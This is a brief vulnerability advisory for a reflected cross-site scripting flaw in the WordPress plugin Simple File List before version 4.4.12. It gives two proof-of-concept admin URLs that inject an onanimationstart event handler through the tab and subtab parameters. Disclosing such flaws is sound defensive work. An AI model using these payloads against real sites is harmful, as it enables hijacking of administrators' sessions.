The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting
https://example.com/wp-admin/admin.php?page=ee-simple-file-list&tab;="style=animation-name:rotation+onanimationstart=alert(/XSS/)// https://example.com/wp-admin/?page=ee-simple-file-list&tab;=settings&subtab;="style=animation-name:rotation+onanimationstart=alert(/XSS/)//
CPE | Name | Operator | Version |
---|---|---|---|
simple-file-list | lt | 4.4.12 |